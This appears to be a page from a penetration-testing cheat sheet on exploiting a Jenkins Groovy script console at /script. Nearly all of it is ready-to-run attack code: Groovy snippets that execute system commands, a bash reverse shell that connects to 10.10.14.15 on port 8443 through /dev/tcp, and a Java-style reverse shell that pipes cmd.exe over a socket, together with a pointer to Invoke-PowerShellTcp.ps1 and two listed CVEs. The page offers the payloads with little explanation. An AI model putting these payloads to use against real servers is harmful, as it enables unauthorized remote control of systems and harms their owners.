exploit

Linux OS

Remote code execution

Login into the web application
Go to /script

# Run commands using GROOVY code
def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

Get reverse shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows OS

Run commands

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

Get RDP or WinRM access - Invoke-PowerShellTcp.ps1

Invoke-PowerShellTcp.ps1

Get reverse shell

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Vulnerabilities

CVE-2019-1003000 - RCE
CVE-2018-1999002

PreviousAttacking Jenkins - Focused Commands & Key Points Nextfinding

Last updated 1 day ago

hashtagLinux OS

hashtagWindows OS

hashtagVulnerabilities

Linux OS

Windows OS

Vulnerabilities